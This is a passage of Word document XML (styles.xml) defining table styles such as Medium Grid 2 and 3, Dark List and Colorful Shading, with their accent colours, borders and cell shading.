        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="209">
    <w:name w:val="Medium Grid 2 Accent 2"/>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C8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2E3D7" w:themeFill="accent2" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F9F3EF" w:themeFill="accent2"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4E8DF" w:themeFill="accent2" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="210">
    <w:name w:val="Medium Grid 2 Accent 3"/>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color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F0EE" w:themeFill="accent3"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5E0DE" w:themeFill="accent3" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="211">
    <w:name w:val="Medium Grid 2 Accent 4"/>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B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="ECE4DA" w:themeFill="accent4" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F4F0" w:themeFill="accent4"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FE9E1" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="212">
    <w:name w:val="Medium Grid 2 Accent 5"/>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color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF1F2" w:themeFill="accent5"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0E4E5" w:themeFill="accent5" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="B2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="213">
    <w:name w:val="Medium Grid 2 Accent 6"/>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D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:insideH w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
        <w:insideV w:val="single" w:color="9D936F" w:themeColor="accent6" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E4DB" w:themeFill="accent6" w:themeFillTint="3F"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F4F0" w:themeFill="accent6"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BE9E2" w:themeFill="accent6" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:insideH w:val="single" w:sz="6" w:space="0"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="CEC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="214">
    <w:name w:val="Medium Grid 3"/>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BFBFBF" w:themeFill="text1"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215">
    <w:name w:val="Medium Grid 3 Accent 1"/>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7E97AD" w:themeFill="accent1"/>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7E97AD" w:themeFill="accent1"/>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7E97AD" w:themeFill="accent1"/>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7E97AD" w:themeFill="accent1"/>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ECBD6" w:themeFill="accent1"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ECBD6" w:themeFill="accent1" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="216">
    <w:name w:val="Medium Grid 3 Accent 2"/>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F2E3D7" w:themeFill="accent2"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C8E60" w:themeFill="accent2"/>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C8E60" w:themeFill="accent2"/>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CC8E60" w:themeFill="accent2"/>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CC8E60" w:themeFill="accent2"/>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E5C6AF" w:themeFill="accent2"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E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="217">
    <w:name w:val="Medium Grid 3 Accent 3"/>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7A6A60" w:themeFill="accent3"/>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7A6A60" w:themeFill="accent3"/>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7A6A60" w:themeFill="accent3"/>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7A6A60" w:themeFill="accent3"/>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EB4AD" w:themeFill="accent3"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EB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="218">
    <w:name w:val="Medium Grid 3 Accent 4"/>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B4936D" w:themeFill="accent4"/>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B4936D" w:themeFill="accent4"/>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B4936D" w:themeFill="accent4"/>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B4936D" w:themeFill="accent4"/>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9C9B6" w:themeFill="accent4"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9C9B6" w:themeFill="accent4" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="219">
    <w:name w:val="Medium Grid 3 Accent 5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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67787B" w:themeFill="accent5"/>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2BCBE" w:themeFill="accent5"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2BCBE" w:themeFill="accent5" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="220">
    <w:name w:val="Medium Grid 3 Accent 6"/>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D936F" w:themeFill="accent6"/>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D936F" w:themeFill="accent6"/>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9D936F" w:themeFill="accent6"/>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9D936F" w:themeFill="accent6"/>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EC9B7" w:themeFill="accent6"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EC9B7" w:themeFill="accent6" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="221">
    <w:name w:val="Dark List"/>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000000" w:themeFill="text1"/>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blLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="222">
    <w:name w:val="Dark List Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:qFormat/>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7E97AD" w:themeFill="accent1"/>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394B5B" w:themeFill="accent1"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577188" w:themeFill="accent1"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577188" w:themeFill="accent1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="577188" w:themeFill="accent1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="577188" w:themeFill="accent1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="223">
    <w:name w:val="Dark List Accent 2"/>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CC8E60" w:themeFill="accent2"/>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714524" w:themeFill="accent2"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AA6736" w:themeFill="accent2"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AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="224">
    <w:name w:val="Dark List Accent 3"/>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7A6A60" w:themeFill="accent3"/>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3C342F" w:themeFill="accent3"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5B4F47" w:themeFill="accent3"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5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="225">
    <w:name w:val="Dark List Accent 4"/>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B4936D" w:themeFill="accent4"/>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5F4930" w:themeFill="accent4"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8F6E49" w:themeFill="accent4"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8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="226">
    <w:name w:val="Dark List Accent 5"/>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67787B" w:themeFill="accent5"/>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333B3D" w:themeFill="accent5"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4D595C" w:themeFill="accent5"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4D595C" w:themeFill="accent5" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4D595C" w:themeFill="accent5" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="4D595C" w:themeFill="accent5" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="227">
    <w:name w:val="Dark List Accent 6"/>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9D936F" w:themeFill="accent6"/>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4F4936" w:themeFill="accent6"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776F51" w:themeFill="accent6"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776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="228">
    <w:name w:val="Colorful Shading"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60"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E5E5E5" w:themeFill="text1" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>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000000" w:themeFill="text1" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="999999" w:themeFill="text1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>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29">
    <w:name w:val="Colorful Shading Accent 1"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="24" w:space="0"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1"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2F4F6" w:themeFill="accent1" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>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455A6D" w:themeFill="accent1"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455A6D" w:themeFill="accent1"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455A6D" w:themeFill="accent1" w:themeFillShade="99"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBD5DE" w:themeFill="accent1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BECBD6"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0">
    <w:name w:val="Colorful Shading Accent 2"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="24" w:space="0"/>
        <w:left w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="CC8E60" w:themeColor="accent2" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="CC8E60" w:themeColor="accent2"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9F3EF" w:themeFill="accent2" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>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88532B" w:themeFill="accent2"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88532B" w:themeFill="accent2"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88532B" w:themeFill="accent2" w:themeFillShade="99"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAD1BF" w:themeFill="accent2" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF"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1">
    <w:name w:val="Colorful Shading Accent 3"/>
    <w:basedOn w:val="106"/>
    <w:uiPriority w:val="71"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblBorders>
        <w:top w:val="single" w:color="B4936D" w:themeColor="accent4" w:sz="24" w:space="0"/>
        <w:left w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="7A6A60" w:themeColor="accent3" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="7A6A60" w:themeColor="accent3"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2F0EE" w:themeFill="accent3" w:themeFillTint="19"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="B4936D"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493F39" w:themeFill="accent3"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493F39" w:themeFill="accent3"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493F39" w:themeFill="accent3" w:themeFillShade="99"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBC2BD" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
